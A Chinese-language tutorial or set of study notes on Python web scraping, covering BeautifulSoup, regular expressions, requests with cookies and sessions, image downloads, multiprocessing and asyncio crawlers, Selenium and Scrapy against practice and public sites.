    from bs4 import BeautifulSoup
    from urllib.request import urlopen

    html = urlopen(
    "https://yulizi123.github.io/static/scraping/list.html"
    ).read().decode('utf-8')
    print(html)
    <!DOCTYPE html><html lang="cn"><head><meta charset="UTF-8"><title>爬虫练习 列表 class | 莫烦 Python</title><style>.jan {background-color: yellow;}.feb {font-size: 25px;}.month {color: red;}</style></head><body><h1>列表 爬虫练习</h1><p>这是一个在 <a href="https://morvanzhou.github.io/" >莫烦 Python</a> 的 <a href="https://morvanzhou.github.io/tutorials/data-manipulation/scraping/" >爬虫教程</a>里无敌简单的网页, 所有的 code 让你一目了然, 清晰无比.</p><ul><li class="month">一月</li><ul class="jan"><li>一月一号</li><li>一月二号</li><li>一月三号</li></ul><li class="feb month">二月</li><li class="month">三月</li><li class="month">四月</li><li class="month">五月</li></ul></body></html>
    soup = BeautifulSoup(html, features='lxml')
    # 用类名做匹配
    month = soup.find_all('li', {"class": "month"}) # 使用字典 查找<li>中 class 类中要包含 month 这个单词
    for m in month:
    print(m) # 如果只打印 m
    print(m.get_text()) # 显示里面的文字
    <li class="month">一月</li>一月<li class="feb month">二月</li>二月<li class="month">三月</li>三月<li class="month">四月</li>四月<li class="month">五月</li>五月
    jan = soup.find('ul', {"class": "jan"})
    print(jan)
    <ul class="jan"><li>一月一号</li><li>一月二号</li><li>一月三号</li></ul>
    d_jan = jan.find_all('li')  # 将 jan 作为一个父对象
    for d in d_jan:
    print(d.get_text())
    一月一号一月二号一月三号

    2.3 BeautifulSoup 解析网页: 正则表达

    from bs4 import BeautifulSoup
    from urllib.request import urlopen
    import re

    html = urlopen(
    "https://yulizi123.github.io/static/scraping/table.html"
    ).read().decode('utf-8')
    print(html)
    <!DOCTYPE html><html lang="cn"><head><meta charset="UTF-8"><title>爬虫练习 表格 table | 莫烦 Python</title><style>img {width: 250px;}table{width:50%;}td{margin:10px;padding:15px;}</style></head><body><h1>表格 爬虫练习</h1><p>这是一个在 <a href="https://morvanzhou.github.io/" >莫烦 Python</a> 的 <a href="https://morvanzhou.github.io/tutorials/data-manipulation/scraping/" >爬虫教程</a>里无敌简单的网页, 所有的 code 让你一目了然, 清晰无比.</p><br/><table id="course-list"><tr><th>分类</th><th>名字</th><th>时长</th><th>预览</th></tr><tr id="course1" class="ml"><td>机器学习</td><td><a href="https://morvanzhou.github.io/tutorials/machine-learning/tensorflow/">Tensorflow 神经网络</a></td><td>2:00</td><td><img src="https://morvanzhou.github.io/static/img/course_cover/tf.jpg"></td></tr><tr id="course2" class="ml"><td>机器学习</td><td><a href="https://morvanzhou.github.io/tutorials/machine-learning/reinforcement-learning/">强化学习</a></td><td>5:00</td><td><img src="https://morvanzhou.github.io/static/img/course_cover/rl.jpg"></td></tr><tr id="course3" class="data"><td>数据处理</td><td><a href="https://morvanzhou.github.io/tutorials/data-manipulation/scraping/">爬虫</a></td><td>3:00</td><td><img src="https://morvanzhou.github.io/static/img/course_cover/scraping.jpg"></td></tr></table></body></html>

    查找所有图片链接

    soup = BeautifulSoup(html, features='lxml')

    img_links = soup.find_all("img", {"src": re.compile('.*?\.jpg')})
    for link in img_links:
    print(link['src'])
    https://morvanzhou.github.io/static/img/course_cover/tf.jpghttps://morvanzhou.github.io/static/img/course_cover/rl.jpghttps://morvanzhou.github.io/static/img/course_cover/scraping.jpg

    设定特定的匹配规则

    course_links = soup.find_all(
    'a', {'href': re.compile('https://morvan.*')})
    for link in course_links:
    print(link['href'])
    https://morvanzhou.github.io/https://morvanzhou.github.io/tutorials/data-manipulation/scraping/https://morvanzhou.github.io/tutorials/machine-learning/tensorflow/https://morvanzhou.github.io/tutorials/machine-learning/reinforcement-learning/https://morvanzhou.github.io/tutorials/data-manipulation/scraping/

    2.4 小练习: 爬百度百科

    设置源地址

    from bs4 import BeautifulSoup
    from urllib.request import urlopen
    import re
    import random

    base_url = "https://baike.baidu.com"
    his = ["/item/%E7%BD%91%E7%BB%9C%E7%88%AC%E8%99%AB/5162711"]

    输出网址

    url = base_url + his[-1]  # 添加 his 列表中的最后一个, 合并成网址
    html = urlopen(url).read().decode('utf-8')
    soup = BeautifulSoup(html, features='lxml')
    print(soup.find('h1').get_text(), '\turl:', his[-1])
    网络爬虫 url: /item/%E7%BD%91%E7%BB%9C%E7%88%AC%E8%99%AB/5162711

    爬取链接

    # 找到合法链接
    # 分析链接的规律: 所有超链接都有<a target=_blank href XXX
    # 以/item/开头
    sub_urls = soup.find_all("a", {"target": "_blank", "href": re.compile("/item/(%.{2})+$")})

    if len(sub_urls) != 0:
    his.append(random.sample(sub_urls, 1)[0]['href'])
    else:
    # 没有找到合法链接
    his.pop()
    print(his)
    ['/item/%E7%BD%91%E7%BB%9C%E7%88%AC%E8%99%AB/5162711', '/item/%E7%BD%91%E7%BB%9C%E6%95%B0%E6%8D%AE']

    加入循环

    from bs4 import BeautifulSoup
    from urllib.request import urlopen
    import re
    import random

    base_url = "https://baike.baidu.com"
    his = ["/item/%E7%BD%91%E7%BB%9C%E7%88%AC%E8%99%AB/5162711"]

    for i in range(20): # 先爬 20 个
    url = base_url + his[-1] # 添加 his 列表中的最后一个, 合并成网址
    html = urlopen(url).read().decode('utf-8')
    soup = BeautifulSoup(html, features='lxml')
    print(soup.find('h1').get_text(), '\turl:', his[-1])

    sub_urls = soup.find_all("a", {"target": "_blank", "href": re.compile("/item/(%.{2})+$")})

    if len(sub_urls) != 0:
    his.append(random.sample(sub_urls, 1)[0]['href'])
    else:
    # 没有找到合法链接
    his.pop()
    print(his)
    网络爬虫 url: /item/%E7%BD%91%E7%BB%9C%E7%88%AC%E8%99%AB/5162711搜索引擎 url: /item/%E6%90%9C%E7%B4%A2%E5%BC%95%E6%93%8E百度 url: /item/%E7%99%BE%E5%BA%A6百度旅游 url: /item/%E7%99%BE%E5%BA%A6%E6%97%85%E6%B8%B8上地 url: /item/%E4%B8%8A%E5%9C%B0北至 url: /item/%E5%8C%97%E8%87%B3西京赋 url: /item/%E8%A5%BF%E4%BA%AC%E8%B5%8B缘竿 url: /item/%E7%BC%98%E7%AB%BF西京赋 url: /item/%E8%A5%BF%E4%BA%AC%E8%B5%8B扛鼎 url: /item/%E6%89%9B%E9%BC%8E任鄙 url: /item/%E4%BB%BB%E9%84%99孟说 url: /item/%E5%AD%9F%E8%AF%B4乌获 url: /item/%E4%B9%8C%E8%8E%B7秦国 url: /item/%E7%A7%A6%E5%9B%BD雍城 url: /item/%E9%9B%8D%E5%9F%8E秦德公 url: /item/%E7%A7%A6%E5%BE%B7%E5%85%AC秦宪公 url: /item/%E7%A7%A6%E5%AE%81%E5%85%AC秦静公 url: /item/%E7%A7%A6%E9%9D%99%E5%85%AC秦文公 url: /item/%E7%A7%A6%E6%96%87%E5%85%AC宝鸡 url: /item/%E5%AE%9D%E9%B8%A1%E5%B8%82['/item/%E7%BD%91%E7%BB%9C%E7%88%AC%E8%99%AB/5162711', '/item/%E6%90%9C%E7%B4%A2%E5%BC%95%E6%93%8E', '/item/%E7%99%BE%E5%BA%A6', '/item/%E7%99%BE%E5%BA%A6%E6%97%85%E6%B8%B8', '/item/%E4%B8%8A%E5%9C%B0', '/item/%E5%8C%97%E8%87%B3', '/item/%E8%A5%BF%E4%BA%AC%E8%B5%8B', '/item/%E6%89%9B%E9%BC%8E', '/item/%E4%BB%BB%E9%84%99', '/item/%E5%AD%9F%E8%AF%B4', '/item/%E4%B9%8C%E8%8E%B7', '/item/%E7%A7%A6%E5%9B%BD', '/item/%E9%9B%8D%E5%9F%8E', '/item/%E7%A7%A6%E5%BE%B7%E5%85%AC', '/item/%E7%A7%A6%E5%AE%81%E5%85%AC', '/item/%E7%A7%A6%E9%9D%99%E5%85%AC', '/item/%E7%A7%A6%E6%96%87%E5%85%AC', '/item/%E5%AE%9D%E9%B8%A1%E5%B8%82', '/item/%E7%BA%A2%E6%B2%B3%E8%B0%B7']

    在此建议大家, 因为有反爬虫机制, 大家最好给自己的程序加上 time.sleep(2), 不然你的程序也不能访问百度百科了

    3.1 Post 登录 Cookies(Requests)

    其实在加载网页的时候, 有几种类型, 而这几种类型就是你打开网页的关键. 最重要的类型 (method) 就是 getpost (当然还有其他的, 比如 head, delete). 刚接触网页构架的朋友可能又会觉得有点懵逼了. 这些请求的方式到底有什么不同? 他们又有什么作用?

    我们就来说两个重要的, get, post, 95% 的时间, 你都是在使用这两个来请求一个网页.

    post
    账号登录
    搜索内容
    上传图片
    上传文件
    往服务器传数据 等

    get
    正常打开网页
    不往服务器传数据

    安装 requests

    pip install requests
    Requirement already satisfied: requests in c:\users\gzjzx\anaconda3\lib\site-packages (2.27.1)Requirement already satisfied: charset-normalizer~=2.0.0 in c:\users\gzjzx\anaconda3\lib\site-packages (from requests) (2.0.4)Requirement already satisfied: idna<4,>=2.5 in c:\users\gzjzx\anaconda3\lib\site-packages (from requests) (3.3)Requirement already satisfied: certifi>=2017.4.17 in c:\users\gzjzx\anaconda3\lib\site-packages (from requests) (2021.10.8)Requirement already satisfied: urllib3<1.27,>=1.21.1 in c:\users\gzjzx\anaconda3\lib\site-packages (from requests) (1.26.9)Note: you may need to restart the kernel to use updated packages.

    使用 requests

    get 请求
    import requests
    # import webbrowser

    param = {"wd": "莫烦 python"}
    r = requests.get('http://www.baidu.com/s', params=param)
    print(r.url)
    # webbrowser.open(r.url) # 打开这个网页: 使用百度搜索 莫烦 python
    http://www.baidu.com/s?wd=%E8%8E%AB%E7%83%A6python
    post 请求

    https://pythonscraping.com/pages/files/form.html

    data = {'firstname': '莫烦', 'lastname': '周'}
    r = requests.post('https://pythonscraping.com/pages/files/processing.php', data=data)
    print(r.text)
    Hello there, 莫烦 周!

    使用 get 请求会返回信息, 而 post 请求不会

    上传文件

    https://pythonscraping.com/files/form2.html

    上传图片也是post的一种

    file = {'uploadFile': open('./images.png', 'rb')}
    r = requests.post(
    'https://pythonscraping.com/pages/files/processing2.php', files=file)
    print(r.text)
    uploads/images.pngThe file image.png has been uploaded.
    登录

    https://pythonscraping.com/pages/cookies/login.html

    payload = {'username': 'Morvan', 'password': 'password'}
    r = requests.post(
    'https://pythonscraping.com/pages/cookies/welcome.php',
    data=payload)
    print(r.cookies.get_dict()) # 网页的 cookie 内容
    r = requests.get('https://pythonscraping.com/pages/cookies/profile.php'
    ,cookies=r.cookies)
    print(r.text)
    {'loggedin': '1', 'username': 'Morvan'}Hey Morvan! Looks like you're still logged into the site!
    session = requests.Session()
    payload = {'username': 'Morvan', 'password': 'password'}
    r = session.post('https://pythonscraping.com/pages/cookies/welcome.php', data=payload)
    print(r.cookies.get_dict())
    r = session.get("https://pythonscraping.com/pages/cookies/welcome.php")
    print(r.text)
    {'loggedin': '1', 'username': 'Morvan'}<h2>Welcome to the Website!</h2>You have logged in successfully! <br/><a href="profile.php">Check out your profile!</a>

    3.2 下载文件

    设置保存路径和图片地址

    import os

    os.makedirs('./img/', exist_ok=True) # 设置保存路径
    IMAGE_URL = "http://www.baidu.com/img/flexible/logo/pc/result.png" # 设置图片地址

    urlretrive url 检索

    from urllib.request import urlretrieve

    urlretrieve(IMAGE_URL, './img/images1.png')
    ('./img/images1.png', <http.client.HTTPMessage at 0x27e707a86a0>)

    使用 requests

    wb 是二进制格式打开一个文件, 源文件存在的话从头编辑, 替代原文件, 不存在的话则创建新文件

    import requests

    r = requests.get(IMAGE_URL)
    with open('./img/images2.png', 'wb') as f:
    f.write(r.content)

    如果要下载一个较大的文件

    r = requests.get(IMAGE_URL, stream=True)
    with open('./img/images3.png', 'wb') as f:
    for chunk in r.iter_content(chunk_size=32): # 每次写入文件时写入 32 个字节
    f.write(chunk)

    3.3 小练习: 下载国家地理美图

    每日一图-地理中文网—《国家地理》杂志中文网站

    好像网站更新了, 有了反爬虫功能? 改成爬取February 27, 2018 | iDaily 每日环球视野

    设置地址

    from bs4 import BeautifulSoup
    import requests

    URL = "http://m.idai.ly/se/a193iG?1661356800"

    设置爬虫参数

    png

    注意到图片都放在 div class="photo"的父对象中

    html = requests.get(URL).text
    soup = BeautifulSoup(html, 'lxml')
    img_ul = soup.find_all('div', {'class': 'photo'})
    img_ul
    [<div class="photo"><img src="http://pic.yupoo.com/fotomag/H9yil7z0/TaRLX.jpg"/><div class="overlay"></div></div>, <div class="photo"><img src="http://pic.yupoo.com/fotomag/757ee474/10530738.jpg"/><div class="overlay"></div></div>, <div class="photo"><img src="http://pic.yupoo.com/fotomag/946704b4/66933a50.jpg"/><div class="overlay"></div></div>, <div class="photo"><img src="http://pic.yupoo.com/fotomag/7aa989ff/b4882755.jpg"/><div class="overlay"></div></div>, <div class="photo"><img src="http://pic.yupoo.com/fotomag/cb529779/d8c7a395.jpg"/><div class="overlay"></div></div>, <div class="photo"><img src="http://pic.yupoo.com/fotomag/2e45a0cd/85b8cc7b.jpg"/><div class="overlay"></div></div>, <div class="photo"><img src="http://pic.yupoo.com/fotomag/e1989816/20e2ebdc.jpg"/><div class="overlay"></div></div>, <div class="photo"><img src="http://pic.yupoo.com/fotomag/42034c62/e67c02ab.jpg"/><div class="overlay"></div></div>, <div class="photo"><img src="http://pic.yupoo.com/fotomag/267e386a/88c891b6.jpg"/><div class="overlay"></div></div>, <div class="photo"><img src="http://pic.yupoo.com/fotomag/65ad43ae/e5d8c29e.jpg"/><div class="overlay"></div></div>, <div class="photo"><img src="http://pic.yupoo.com/fotomag/1213e2a1/3faaaedd.jpg"/><div class="overlay"></div></div>, <div class="photo"><img src="http://pic.yupoo.com/fotomag/d009c863/b6f97eca.jpg"/><div class="overlay"></div></div>, <div class="photo"><img src="http://pic.yupoo.com/fotomag/76c66979/84fa84fa.jpg"/><div class="overlay"></div></div>, <div class="photo"><img src="http://pic.yupoo.com/fotomag/9023854c/619b3b2e.jpg"/><div class="overlay"></div></div>, <div class="photo"><img src="http://pic.yupoo.com/fotomag/8a75067c/2a3ecbf9.jpg"/><div class="overlay"></div></div>, <div class="photo"><img src="http://pic.yupoo.com/fotomag/30e65430/a1f9a680.jpg"/><div class="overlay"></div></div>]

    设置保存文件夹

    import os

    os.makedirs('./img/', exist_ok=True)

    下载

    for ul in img_ul:
    imgs = ul.find_all('img')
    for img in imgs:
    url = img['src']
    r = requests.get(url, stream=True)
    image_name = url.split('/')[-1]
    with open('./img/%s' % image_name, 'wb') as f:
    for chunk in r.iter_content(chunk_size=128):
    f.write(chunk)
    print('Saved %s' % image_name)
    Saved TaRLX.jpgSaved 10530738.jpgSaved 66933a50.jpgSaved b4882755.jpgSaved d8c7a395.jpgSaved 85b8cc7b.jpgSaved 20e2ebdc.jpgSaved e67c02ab.jpgSaved 88c891b6.jpgSaved e5d8c29e.jpgSaved 3faaaedd.jpgSaved b6f97eca.jpgSaved 84fa84fa.jpgSaved 619b3b2e.jpgSaved 2a3ecbf9.jpgSaved a1f9a680.jpg

    得到爬取的文件:

    png

    4.1 多进程分布式爬虫

    png

    import multiprocessing as mp
    import time
    from urllib.request import urlopen, urljoin
    from bs4 import BeautifulSoup
    import re

    base_url = "https://mofanpy.com/"

    # 不要持续爬取一个网站的信息, 否则你可能再也登陆不上这个网页
    if base_url != "https://127.0.0.1:4000/": # 如果用外网, 就限制爬取
    restricted_crawl = True
    else:
    restricted_crawl = False

    定义爬取的函数

    def crawl(url):
    response = urlopen(url)
    time.sleep(0.1) # 对下载作一个轻微延迟: 0.1 秒
    return response.read().decode()

    解析

    def parse(html):
    soup = BeautifulSoup(html, 'lxml')
    urls = soup.find_all('a', {'href': re.compile('^/.+?$')})
    title = soup.find('h1').get_text().strip()
    # set() 函数创建一个无序不重复元素集,可进行关系测试,删除重复数据,还可以计算交集、差集、并集等。
    page_urls = set([urljoin(base_url, url['href']) for url in urls])
    url = soup.find('meta', {'property': 'og:url'})['content']
    return title, page_urls, url

    常规方式爬取

    unseen = set([base_url,])
    seen = set()

    count, t1 = 1, time.time()

    while len(unseen) != 0:
    if restricted_crawl and len(seen) > 20:
    break

    print('\nDistributed Crawling...')
    htmls = [crawl(url) for url in unseen]

    print('\nDistributed Parsing...')
    results = [parse(html) for html in htmls]

    print('\nAnalysing...')
    seen.update(unseen)
    unseen.clear()

    for title, page_urls, url in results:
    print(count, title, url)
    count += 1
    unseen.update(page_urls - seen)
    print('Total time: %.1f s' % (time.time() - t1, ))
    Distributed Crawling...Distributed Parsing...Analysing...1 莫烦 Python 主页 http://mofanpy.com/Distributed Crawling...Distributed Parsing...Analysing...2 数据处理 http://mofanpy.com/tutorials/data-manipulation3 有趣的机器学习 http://mofanpy.com/tutorials/machine-learning/ML-intro/4 机器学习 http://mofanpy.com/tutorials/machine-learning5 Python 基础教学 http://mofanpy.com/tutorials/python-basic6 其他效率教程 http://mofanpy.com/tutorials/othersDistributed Crawling...Distributed Parsing...Analysing...7 Numpy 数据怪兽 http://mofanpy.com/tutorials/data-manipulation/numpy8 Matplotlib 画图 http://mofanpy.com/tutorials/data-manipulation/plt9 交互式学 Python http://mofanpy.com/tutorials/python-basic/interactive-python/10 进化算法 (Evolutionary-Algorithm) http://mofanpy.com/tutorials/machine-learning/evolutionary-algorithm/11 强化学习 (Reinforcement Learning) http://mofanpy.com/tutorials/machine-learning/reinforcement-learning/12 自然语言处理 http://mofanpy.com/tutorials/machine-learning/nlp/13 数据的伙伴 Pandas http://mofanpy.com/tutorials/data-manipulation/pandas14 窗口视窗 (Tkinter) http://mofanpy.com/tutorials/python-basic/tkinter/15 有趣的机器学习 http://mofanpy.com/tutorials/machine-learning/ML-intro16 PyTorch http://mofanpy.com/tutorials/machine-learning/torch/17 Keras http://mofanpy.com/tutorials/machine-learning/keras/18 SciKit-Learn http://mofanpy.com/tutorials/machine-learning/sklearn/19 Theano http://mofanpy.com/tutorials/machine-learning/theano/20 多线程 (Threading) http://mofanpy.com/tutorials/python-basic/threading/21 多进程 (Multiprocessing) http://mofanpy.com/tutorials/python-basic/multiprocessing/22Linux 简易教学 http://mofanpy.com/tutorials/others/linux-basic/23 Tensorflow http://mofanpy.com/tutorials/machine-learning/tensorflow/24 生成模型 GAN 网络 http://mofanpy.com/tutorials/machine-learning/gan/25 Git 版本管理 http://mofanpy.com/tutorials/others/git/26 机器学习实战 http://mofanpy.com/tutorials/machine-learning/ML-practice/27 网页爬虫 http://mofanpy.com/tutorials/data-manipulation/scrapingTotal time: 7.4s

    多进程爬取

    unseen = set([base_url,])
    seen = set()

    pool = mp.Pool(4)
    count, t1 = 1, time.time()
    while len(unseen) != 0:
    if restricted_crawl and len(seen) > 20:
    break
    print('\nDistributed Crawling...')
    crawl_jobs = [pool.apply_async(crawl, args=(url,)) for url in unseen]
    html = [j.get() for j in crawl_jobs]

    print('\nDistributed Parsing...')
    parse_jobs = [pool.apply_async(parse, args=(html,)) for html in htmls]
    results = [j.get() for j in parse_jobs]

    print('\nAnalysing...')
    seen.update(unseen)
    unseen.clear()

    for title, page_urls, url in results:
    print(count, title, url)
    count += 1
    unseen.update(page_urls - seen)
    print('Total time: %.1f s' % (time.time() - t1, ))
    Distributed Crawling...

    4.2 加速爬虫: 异步加载 Asyncio

    之前我一直在想如何用 multiprocessing 或者 threading 加速我的爬虫, 也做过了一些小实验, 确实, 我们看到了不小的效率提升. 但是当我更加深入的时候, 我发现, Python 还提供了一个有力的工具, 叫做 asyncio. 这是一个仅仅使用单线程, 就能达到多线程/进程的效果的工具.

    它的原理, 简单说就是: 在单线程里使用异步计算, 下载网页的时候和处理网页的时候是不连续的, 更有效利用了等待下载的这段时间.

    那么, 我们今天就来尝试使用 asyncio 来替换掉 multiprocessing 或者 threading, 看看效果如何.

    png

    常规

    import time


    def job(t):
    print('Start job', t)
    time.sleep(t)
    print('Job', t, 'takes', t, 's')


    def main():
    [job(t) for t in range(1, 3)]


    t1 = time.time()
    main()
    print('NO async total time: ', time.time() - t1)
    Start job 1Job 1 takes 1sStart job 2Job 2 takes 2sNO async total time:  3.010831594467163

    asyncio

    jupyter 对异步的支持不是特别好, 换 pycharm

    import time
    import asyncio


    async def job(t): # async 形式的功能
    print('Start job ', t)
    await asyncio.sleep(t) # 等待 "t" 秒, 期间切换其他任务
    print('Job ', t, ' takes ', t, ' s')


    async def main(loop): # async 形式的功能
    tasks = [
    loop.create_task(job(t)) for t in range(1, 3)
    ] # 创建任务, 但是不执行
    await asyncio.wait(tasks) # 执行并等待所有任务完成


    t1 = time.time()
    loop = asyncio.get_event_loop() # 建立 loop
    loop.run_until_complete(main(loop)) # 执行 loop
    loop.close() # 关闭 loop
    print("Async total time : ", time.time() - t1)
    Start job  1Start job  2Job  1  takes  1sJob  2  takes  2sAsync total time :  2.019124984741211

    常规方式爬取信息

    import requests

    URL = 'https://mofanpy.com/'


    def normal():
    for i in range(2):
    r = requests.get(URL)
    url = r.url
    print(url)

    t1 = time.time()
    normal()
    print("Normal total time:", time.time() - t1)
    https://mofanpy.com/https://mofanpy.com/Normal total time: 0.26386022567749023

    使用 asyncio

    import aiohttp
    import time
    import asyncio

    URL = 'https://mofanpy.com/'

    async def job(session):
    response = await session.get(URL) # 等待并切换
    return str(response.url)


    async def main(loop):
    async with aiohttp.ClientSession() as session: # 官网推荐建立 Session 的形式
    tasks = [loop.create_task(job(session)) for _ in range(2)]
    finished, unfinished = await asyncio.wait(tasks)
    all_results = [r.result() for r in finished] # 获取所有结果
    print(all_results)

    t1 = time.time()
    loop = asyncio.get_event_loop()
    loop.run_until_complete(main(loop))
    loop.close()
    print("Async total time:", time.time() - t1)
    ['https://mofanpy.com/', 'https://mofanpy.com/']Async total time: 0.1562364101409912

    5.1 高级爬虫: 让 Selenium 控制你的浏览器帮你爬

    那么你什么时候会要用到 Selenium 呢? 当你:

    • 发现用普通方法爬不到想要的内容
    • 网站跟你玩捉迷藏, 太多 JavaScript 内容
    • 需要像人一样浏览的爬虫

    这个插件能让你记录你使用浏览器的操作. 我以前玩网游, 为了偷懒, 用过一个叫按键精灵的东西, 帮我做了很多重复性的工作, 拯救了我的鼠标和键盘, 当然还有我的手指! 看着别人一直在点鼠标, 我心中暗爽~ 这个 Katalon Recorder 插件 + Selenium 就和按键精灵是一个意思. 记录你的操作, 然后你可以让电脑重复上千遍.

    每当你点击的时候, 插件就会记录下你这些点击, 形成一些 log. 最后神奇的事情将要发生. 你可以点击 Export 按钮, 观看到帮你生成的浏览记录代码!

    png

    png

    安装

    selenium + Edge 浏览器_tk1023 的博客-CSDN 博客_edge selenium

    “Hello world”

    from time import sleep
    from selenium import webdriver

    driver = webdriver.Edge() # 打开 Edge 浏览器

    driver.get(r'https://www.baidu.com/') # 打开 https://www.baidu.com/

    sleep(5) # 5 秒后
    driver.close() # 关闭浏览器

    Python 控制浏览器

    from selenium import webdriver

    driver = webdriver.Edge() # 打开 Edge 浏览器

    # 将刚刚复制的帖在这
    driver.get("https://mofanpy.com/")
    driver.find_element_by_xpath(u"//img[@alt='强化学习 (Reinforcement Learning)']").click()
    driver.find_element_by_link_text("About").click()
    driver.find_element_by_link_text(u"赞助").click()
    driver.find_element_by_link_text(u"教程 ▾").click()
    driver.find_element_by_link_text(u"数据处理 ▾").click()
    driver.find_element_by_link_text(u"网页爬虫").click()

    # 得到网页 html, 还能截图
    html = driver.page_source # get html
    driver.get_screenshot_as_file("./img/sreenshot1.png")
    driver.close()

    png

    不过每次都要看着浏览器执行这些操作, 有时候有点不方便. 我们可以让 selenium 不弹出浏览器窗口, 让它安静地执行操作. 在创建 driver 之前定义几个参数就能摆脱浏览器的身体了.

    # 原作者用的是 Chrome..执行不了
    from selenium.webdriver.chrome.options import Options

    chrome_options = Options()
    chrome_options.add_argument("--headless") # define headless

    driver = webdriver.Chrome(chrome_options=chrome_options)

    Selenium 能做的事还有很多, 比如填 Form 表单, 超控键盘等等.
    这个教程不会细说了, 只是个入门, 如果你还想继续深入了解, 欢迎点进去他们的 Python 教学官网

    最后, Selenium 的
    优点我们都看出来了, 可以很方便的帮你模拟你的操作, 添加其它操作也是非常容易的,

    但是也是有缺点的, 不是任何时候 Selenium 都很好. 因为要打开浏览器, 加载更多东西, 它的执行速度肯定没有其它模块快. 所以如果你需要速度, 能不用 Selenium, 就不用吧.

    5.2 高级爬虫: 高效无忧的 Scrapy 爬虫库

    png

    import scrapy


    class MofanSpider(scrapy.Spider):
    name = "mofan"
    start_urls = [
    'https://mofanpy.com/',
    ]
    # unseen = set()
    # seen = set() # 我们不在需要 set 了, 它自动去重
    def parse(self, response):
    yield { # return some results
    'title': response.css('h1::text').extract_first(default='Missing').strip().replace('"', ""),
    'url': response.url,
    }
    urls = response.css('a::attr(href)').re(r'^/.+?/$') # find all sub urls
    for url in urls:
    yield response.follow(url, callback=self.parse) # it will filter duplication automatically

    这个教程教你写出一个 Scrapy 形式的爬虫, 带你入门 Scrapy, 但是 Scrapy 不仅仅只有爬虫, 你需要学习更多. 那学习 Scrapy 的地方, 当然是他们自家网站咯.

    ]]>
    + 官网

    课程

    1.1 了解网页结构

    查看网页源代码

    爬取网页: Scraping tutorial 1 | 莫烦 Python

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    <!DOCTYPE html>
    <html lang="cn">
    <head>
    <meta charset="UTF-8">
    <title>Scraping tutorial 1 | 莫烦 Python</title>
    <link rel="icon" href="https://morvanzhou.github.io/static/img/description/tab_icon.png">
    </head>
    <body>
    <h1>爬虫测试 1</h1>
    <p>
    这是一个在 <a href="https://morvanzhou.github.io/">莫烦 Python</a>
    <a href="https://morvanzhou.github.io/tutorials/data-manipulation/scraping/">爬虫教程</a> 中的简单测试.
    </p>

    </body>
    </html>
    1
    2
    3
    4
    5
    6
    7
    from urllib.request import urlopen

    html = urlopen(
    "https://yulizi123.github.io/static/scraping/basic-structure.html"
    ).read().decode('utf-8')
    # 因为这个网页有中文元素, 应该用 utf-8 解码
    print(html)
    <!DOCTYPE html><html lang="cn"><head><meta charset="UTF-8"><title>Scraping tutorial 1 | 莫烦 Python</title><link rel="icon" href="https://morvanzhou.github.io/static/img/description/tab_icon.png"></head><body><h1>爬虫测试 1</h1><p>这是一个在 <a href="https://morvanzhou.github.io/">莫烦 Python</a><a href="https://morvanzhou.github.io/tutorials/data-manipulation/scraping/">爬虫教程</a> 中的简单测试.</p></body></html>

    先导: 正则表达式 Regular Expression

    教程:

    正则表达式 (Regular Expression) 又称 RegEx, 是用来匹配字符的一种工具. 在一大串字符中寻找你需要的内容. 它常被用在很多方面, 比如网页爬虫, 文稿整理, 数据筛选等等.

    从浏览器中读取的代码中找到有用的信息

    简单 Python 匹配
    1
    2
    3
    4
    5
    pattern1 = "cat"
    pattern2 = "bird"
    string = "dog runs to cat"
    print(pattern1 in string)
    print(pattern2 in string)
    TrueFalse
    用正则表达式寻找配对
    1
    2
    3
    4
    5
    6
    7
    import re

    pattern1 = "cat"
    pattern2 = "bird"
    string = "dog runs to cat"
    print(re.search(pattern1, string))
    print(re.search(pattern2, string))
    <re.Match object; span=(12, 15), match='cat'>None

    在 string 12-15 之间找到了字符串 cat

    匹配多种可能 使用[]

    两种可能 run 或 ran

    1
    2
    ptn = r"r[au]n"  # 加了 r 就是表达式, 没加就是字符串
    print(re.search(ptn, "dog runs to cat"))
    <re.Match object; span=(4, 7), match='run'>
    匹配多种可能
    1
    2
    3
    4
    print(re.search(r"r[A-Z]n", "dog runs to cat"))  # 大写字母
    print(re.search(r"r[a-z]n", "dag runs to cat")) # 小写字母
    print(re.search(r"r[0-9]n", "dog r1ns to cat")) # 数字
    print(re.search(r"r[0-9a-z]n", "dog runs to cat")) # 字母或数字
    None<re.Match object; span=(4, 7), match='run'><re.Match object; span=(4, 7), match='r1n'><re.Match object; span=(4, 7), match='run'>
    特殊种类匹配
    数字
    1
    2
    3
    4
    # \d: 匹配所有数字
    print(re.search(r"r\dn", "run r4n"))
    # \d: 匹配所有非数字
    print(re.search(r"r\Dn", "run r4n"))
    <re.Match object; span=(4, 7), match='r4n'><re.Match object; span=(0, 3), match='run'>
    空白
    1
    2
    3
    4
    # \s: 任何空白, 如\t, \n, \r, \f, \v
    print(re.search(r"r\sn", "r\nn r4n"))
    # \S: 任何非空白
    print(re.search(r"r\Sn", "r\nn r4n"))
    <re.Match object; span=(0, 3), match='r\nn'><re.Match object; span=(4, 7), match='r4n'>
    所有数字和下划线_
    1
    2
    3
    4
    # \w: [a-zA-Z0-9_]
    print(re.search(r"r\wn", "r\nn r4n"))
    # \W: 与\w 相反
    print(re.search(r"r\Wn", "r\nn r4n"))
    <re.Match object; span=(4, 7), match='r4n'><re.Match object; span=(0, 3), match='r\nn'>
    空白字符
    1
    2
    3
    4
    5
    6
    # \b: 空格
    print(re.search(r"\bruns\b", "dog runs to cat"))
    print(re.search(r"\bruns\b", "dog runsto cat"))
    # \B: 非空格
    print(re.search(r"\Bruns\B", "dog runs to cat"))
    print(re.search(r"\Bruns\B", "dogrunsto cat"))
    <re.Match object; span=(4, 8), match='runs'>NoneNone<re.Match object; span=(3, 7), match='runs'>
    特殊字符 任意字符
    1
    2
    3
    4
    # \\: 匹配反斜杠\
    print(re.search(r"runs\\", "runs\ to me"))
    # .: 匹配除了\n 外的任何字符
    print(re.search(r"r.ns", "r[ns to me"))
    <re.Match object; span=(0, 5), match='runs\\'><re.Match object; span=(0, 4), match='r[ns'>
    句尾句首
    1
    2
    3
    4
    # ^: 在句首匹配
    print(re.search(r"^dog", "dog runs to cat"))
    # $: 在句尾匹配
    print(re.search(r"cat$", "dog runs to cat"))
    <re.Match object; span=(0, 3), match='dog'><re.Match object; span=(12, 15), match='cat'>
    是否
    1
    2
    3
    # ()?: 无论括号内是否有内容, 都会被匹配
    print(re.search(r"Mon(day)?", "Monday"))
    print(re.search(r"Mon(day)?", "Mon"))
    <re.Match object; span=(0, 6), match='Monday'><re.Match object; span=(0, 3), match='Mon'>
    多行匹配
    1
    2
    3
